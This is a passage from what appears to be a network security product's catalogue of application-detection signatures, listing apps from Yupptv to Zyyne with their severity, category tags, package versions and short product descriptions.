Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yummy Software is a software company that creates Mac FTP software.
Back to top

Yupptv

About this situation: yupptv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

Yuuguu

About this situation: Yuuguu usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Yuuguu is a desktop sharing and web conferencing application.Yuuguu offers cross network instant messaging, real time collaboration, instant screen sharing, web conferencing and remote support. The Yuuguu desktop client is cross-platform and there is also a web-based browser client.
Back to top

Z-Bake-Desktop

About this situation: Application Z-Bake-Desktop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Z-Bake - server based order entry, billing, costing and production, purchasing, and POS management system.
Back to top

Zabbix

About this situation: Zabbix
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-1145-5242
Description: Zabbix is an enterprise-class open source software for monitoring of networks and applications, created by Alexei Vladishev. Source: Wikipedia
Back to top

Zamzar

About this situation: Application Zamzar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zamzar is online video converter, audio converter, image converter, eBook converter.
Back to top

Zapak-Mail

About this situation: Zapak Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Email service that allows users to send and receive emails through the web service with only a web browser.
Back to top

Zapier

About this situation: Application Zapier detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zapier makes it easy to automate tasks between web apps.
Back to top

Zaplee

About this situation: Application Zaplee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zaplee is global cloud based Virtual PBX Phone System provider for your small business.
Back to top

Zappos

About this situation: Application Zappos detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zappos is an online apparel and footwear sales by provide shoppers the service and selection.
Back to top

Zapproved

About this situation: Application Zapproved detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zapproved is a developer of cloud-hosted software for corporate legal departments. The Z-Discovery platform returns power to in-house corporate legal teams and helps them navigate electronic discovery with minimal risk and cost, and it sets new standards for scalability and intuitive design.
Back to top

ZAPTEST

About this situation: Application ZAPTEST detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: ZAPTEST is a software test automation solution for testing applications cross-platform. ZAPTEST allows testing of any GUI based software on any modern OS, mobile or conventional including iOS, Android, WinMo, Blackberry, Windows, Mac, and Linux, and supports testing of Agile and CI development.
Back to top

Zavanti-ERP

About this situation: Application Zavanti-ERP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zavanti ERP provide detailed financial, sales and operational control for businesses in the Real Estate, Construction and professional Services industries.
Back to top

Zbigz

About this situation: ZbigZ usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This client allows users to download torrent files from a network which contains movies, other videos, musical albums, books, and applications.
Back to top

ZCOPE

About this situation: Application ZCOPE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZCOPE is a web application for project management, task management, team communication and document management
Back to top

zeckoShop

About this situation: Application zeckoShop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: zeckoShop provides web design, eCommerce, accounting web integration. It specializes in integrated eCommerce to accounting packages.
Back to top

Zed-Axis

About this situation: Application Zed-Axis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zed Axis helps import, export and update transactions and lists from text, Excel or bank downloads directly into your QuickBooks company file.
Back to top

Zelune-Proxy

About this situation: Zelune-Proxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-773-5211
Description: Zelune is a web proxy script.
Back to top

Zenbe-Mail

About this situation: Zenbe Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Email service that allows users to send and receive emails through the web service with only a web browser.
Back to top

ZenCart

About this situation: Application ZenCart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zen Cart truly is e-commerce open source shopping cart software. The ecommerce web site design program is developed by a group of like-minded shop owners, programmers, designers, and consultants that think ecommerce web design could be, and should be, done differently.
Back to top

ZenCash

About this situation: Application ZenCash detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZenCash automates the entire accounts receivable and collections process-from the day you send an invoice to the day you get paid. The online service allows you to automate invoice reminders such as printed invoices and phone calls, send personalized thank you notes, and even route default accounts to collections straight from the application.
Back to top

Zencoder

About this situation: Application Zencoder detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zencoder is web-based video encoding software as a service, designed to quickly convert any video into web and mobile compatible formats. It is for web sites and applications that accept uploaded videos and need to encode them to standard formats.
Back to top

Zendesk

About this situation: zendesk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This application is a Software as a Service (SaaS) that functions as a support management tool.
Back to top

ZenDoc

About this situation: Application ZenDoc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZenDoc's cloud-based software relieves you of the cost and complexity of maintaining your quality management system.
Back to top

Zendone

About this situation: Application Zendone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zendone is a task management software for Getting Things Done
Back to top

Zenefits

About this situation: Application Zenefits detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zenefits gives you a single place to manage your payroll, benefits, HR, and compliance -- all online, all in one dashboard.
Back to top

ZenFieldservice

About this situation: Application ZenFieldservice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZenFieldservice is an online system that allows any service business to manage the day to day management of their business.From initial quotes to final invoicing, every aspect of a service business can be automated through the intuitive online service.
Back to top

Zenfolio

About this situation: Application Zenfolio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zenfolio is a professional photo and video hosting for photographers.
Back to top

Zenkraft

About this situation: Application Zenkraft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZenKrafts shipping integration enables Salesforce users to mail and ship to any lead, contact, account or opportunity.
Back to top

ZenMate

About this situation: ZenMate usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1764-5242
Description: ZenMate is a free VPN application that is installed as a Chrome browser plugin. ZenMate encrypts all browser traffic.
Back to top

Zenno

About this situation: Zenno usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: This site is a Japanese web mail service that allows users to send and receive e mails.
Back to top

ZenPayroll

About this situation: Application ZenPayroll detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZenPayroll service enables businesses to get set up and run payroll in minutes, from any web enabled device.
Back to top

Zenput---Mobile-Forms

About this situation: Application Zenput---Mobile-Forms detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Create mobile forms and start collecting data from any mobile device. Zenput makes to build mobile data collection forms and to send those forms to smartphones and tablets.
Back to top

Zentail-Commerce

About this situation: Application Zentail-Commerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zentail Commerce is an SaaS platform for multi channel retailers.
Back to top

ZeptoLab-Cut-the-Rope

About this situation: ZeptoLab Cut the Rope traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: Cut the Rope is a mobile platform game.
Back to top

ZeptoLab-Pudding-Monsters

About this situation: ZeptoLab Pudding Monsters traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-628-5211
Description: Pudding Monsters is a mobile game.
Back to top

ZergNet

About this situation: ZergNet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: ZergNet is an online content aggregation company. Their business model is to drive traffic for their customers by linking content between them. Source: Wikipedia.
Back to top

Zero

About this situation: Zero traffic
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1654-5242
Description: Zero protocol usage detected. Zero is a crypto protocol based on the UDP crypto protocol QUIC.
Back to top

ZeroCater

About this situation: Application ZeroCater detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZeroCater helps companies to feed their employees by arranging meals delivered from local pop-up kitchens, gourmet food trucks, restaurants, private chefs and caterers.
Back to top

Zeropc

About this situation: ZeroPC usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: ZeroPC connects to different cloud services to access , search, manage and share user content including documents, photos, videos and more.
Back to top

ZeroTier

About this situation: Endpoint Context Agent based ZeroTier Connection
Context: EI Correlation
Severity: 1
Tags: Tunneling, Endpoint
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1246-5242
Description: ZeroTier endpoint application has been detected. ZeroTier is a network virtualization solution. ZeroTier supports most platforms including Windows, Mac, Linux and Android.
Back to top

ZeroTier

About this situation: ZeroTier traffic
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1246-5242
Description: ZeroTier is a network virtualization solution. ZeroTier supports most platforms including Windows, Mac, Linux and Android.
Back to top

Zetta

About this situation: Application Zetta detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zetta is cloud-based backup and DR solution. Optimized for data sets above 500GB.
Back to top

Zeus-Travel-Office

About this situation: Application Zeus-Travel-Office detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zeus - auto-provisioning software for Travel Agencies and Agents.
Back to top

Ziddu

About this situation: ziddu usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

Zilicus

About this situation: Application Zilicus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZilicusPM - web based complete project management software that makes work management and execution easier.
Back to top

Zillow

About this situation: Application Zillow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zillow is a marketplace where homeowners, buyers, sellers, renters, real estate agents and mortgage professionals find and share information about homes and mortgages.
Back to top

zimbra

About this situation: Application zimbra detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Over 500 million people rely on Zimbra and enjoy enterprise-class open source email collaboration at the lowest TCO in the industry. Discover the benefits
Back to top

Zimbra-Collaboration-Suite

About this situation: Zimbra Collaboration Suite usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1607-5242
Description: Zimbra Collaboration Suite is a web-based mail solution for small and enterprise business's email needs. The application landing page is http://www.zimbra.com.
Back to top

Zimplu-CRM

About this situation: Application Zimplu-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Web Application for Sales, Contact Management, tasks, notes file sharing, support tickets, and much more.
Back to top

Zinepal

About this situation: Application Zinepal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zinepal allow create and share PDFs and eBooks from online content or read PDFs and eBooks created by others.
Back to top

ZingCheckout

About this situation: Application ZingCheckout detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZingCheckout is a Point of Sale that works on various devices such as a PC, Mac, Android and iPad. It has all the great features of a POS, but with social capabilities as well.
Back to top

Zingiri

About this situation: Application Zingiri detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zingiri provides apps for e-commerce, online reservation for small businesses.
Back to top

Zingtree

About this situation: Application Zingtree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zingtree is an online toolkit for creating interactive decision trees and troubleshooters, which empowers companies to give their customers a quick, efficient way of getting answers quickly. Customers answer questions in a simple QandA format, which in many cases leads to a problem solution.
Back to top

Zinio

About this situation: Zinio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-628-5211
Description: Zinio is a digital magazine subscription and delivery service.
Back to top

Zions-Bancorporation

About this situation: Zions Bancorporation usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1769-5242
Description: Zions Bancorporation is a financial services company.
Back to top

Zip File

About this situation: Zip file detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Archive, Zip Archive
First detected in: sgpkg-ips-557-5211
Last changed: sgpkg-ips-557-5211
Description:
Back to top

Zip-Cloud

About this situation: Zip Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Allowes users to backup Files to the Cloud.
Back to top

ZipBoss

About this situation: Application ZipBoss detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZipBoss is business cloud providing content management and internet publishing services. The zipboss website is out of Beta and growing fast, plugging in new features while helping new customers get professional websites without the hassle and scary costs.
Back to top

Zipcar

About this situation: Zipcar usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Zipcar provides automobile reservations to its members, billable by the hour or day. Zipcar members pay a monthly or annual membership fee in addition to car rental charges.
Back to top

ZipDX

About this situation: Application ZipDX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZipDX is an audio conference platform for hosting audio conference calls.
Back to top

ZippyShare

About this situation: ZippyShare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-602-5211
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

Ziprecruiter

About this situation: ZipRecruiter usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: ZipRecruiter.com is an online job distribution and job board service. The web-based platform aggregates applications from job boards and provides tools for applicant tracking and screening. It is a subscription-based SaaS for employers, recruiting firms, and staffing agencies. The job board search and application process are free for job seekers.
Back to top

Zipsurvey

About this situation: zipsurvey usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: ZipSurvey online survey software by CorporateSurvey.com is a web-hosted research application developed and supported by Ph.D. level I/O psychologists for business and HR consultants, market researchers, professionals, students or anyone interested in conducting online research quickly and affordably.
Back to top

Zmags

About this situation: Application Zmags detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zmags is shoppable content company, that empowers digital marketing and ecommerce professionals to create and publish engaging digital experiences in minutes, without writing a single line of code.
Back to top

Zmanda

About this situation: Application Zmanda detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zmanda is provider of open source backup and recovery software. Open source development and distribution model enables us to deliver the highest quality backup software such as Amanda Enterprise and Zmanda Recovery Manager for MySQL
Back to top

Zocdoc

About this situation: ZocDoc usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: ZocDoc provides free of charge medical care search facility for end users by integrating information about medical practices and doctors individual schedules in a central location.
Back to top

Zoho

About this situation: Zoho usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1769-5242
Description: Zoho is SaaS company that is known for their CRM.
Back to top

Zoho-Meeting-App

About this situation: Zoho Meeting usage detected.
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1873-5242
Description: Zoho Meeting is a communications service that allows users to conduct discussions and collaborate online through audio, video, and screen sharing.
Back to top

ZoneEdit

About this situation: Application ZoneEdit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZoneEdit provider of DNS services online. With over 600,000 zones under management, countless customers have trusted ZoneEdit for over a decade to provide the most stable, powerful DNS management available with a simple user interface to make multiple zone management extremely easy. ZoneEdit makes zone record editing for power users
Back to top

Zoolz

About this situation: Zoolz usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A cloud-based storage application
Back to top

Zoom

About this situation: Endpoint Context Agent based Zoom detection
Context: EI Correlation
Severity: 1
Tags: Web Conferencing, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Zoom endpoint application has been detected. Zoom is a web conferencing solution by Zoom Video Communications.
Back to top

Zoom

About this situation: Zoom
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-1845-5242
Description: Zoom is a cloud based collaboration application that allow users to perform online meetings from their computer.
Back to top

Zoomerang

About this situation: Application Zoomerang detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zoomerang.com is an online survey tool that allows users to create, send and analyze online survey results on-demand.
Back to top

ZoomInfo

About this situation: Application ZoomInfo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Growth Acceleration Platform ZoomInfo delivers detailed contact information to grow up sales marketing funnels-backed by a comprehensive B2B database.
Back to top

Zoovy

About this situation: Application Zoovy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zoovy is a technology developer that specializes in building integrated commercial platforms.
Back to top

Zopim

About this situation: Application Zopim detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zopim provides help desk system to chat with customers for support.
Back to top

Zotero

About this situation: Application Zotero detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zotero is the tool that helps gather, organize, and analyze sources
Back to top

ZOZI

About this situation: Application ZOZI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ZOZI is a provider of online booking software for tour and activity businesses.
Back to top

Zscaler

About this situation: Application Zscaler detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zscaler provides internet security with the industry security as a service platform.
Back to top

Zultys

About this situation: Application Zultys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zultys is a provider of UCaaS, SaaS, hosted business phone services and premise based communications systems.
Back to top

ZumoDrive

About this situation: ZumoDrive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1238-5242
Description: ZumoDrive usage has been detected.
Back to top

Zuora

About this situation: Application Zuora detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zuora's cloud technologies help companies build subscription business models by establishing, cultivating and monetizing recurring customer relationships.
Back to top

Zuppler

About this situation: Application Zuppler detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zuppler is a mobile and web-based food ordering platform. It provides technology with customizations for clients.
Back to top

Zylom

About this situation: Zylom usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Zyme

About this situation: Application Zyme detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zyme provides a channel data management
Back to top

Zyncro

About this situation: Application Zyncro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zyncro is a secure, private and easy to activate Enterprise Social Network that doesn't require any hardware or licenses as it is a cloud-hosted solution.
Back to top

Zynga-FarmVille

About this situation: Zynga FarmVille traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-666-5211
Description: FarmVille is a social network game.
Back to top

Zynga-Games

About this situation: Zynga Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allow users to play games that work on mobile devices, through its website, and on social networking sites. Source: Wikipedia
Back to top

Zynga-Mafia-Wars

About this situation: Zynga Mafia Wars traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-630-5211
Description: Mafia Wars is a social network game.
Back to top

Zyyne

About this situation: Application Zyyne detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Zyyne is an online platform that boosts your publications
Back to top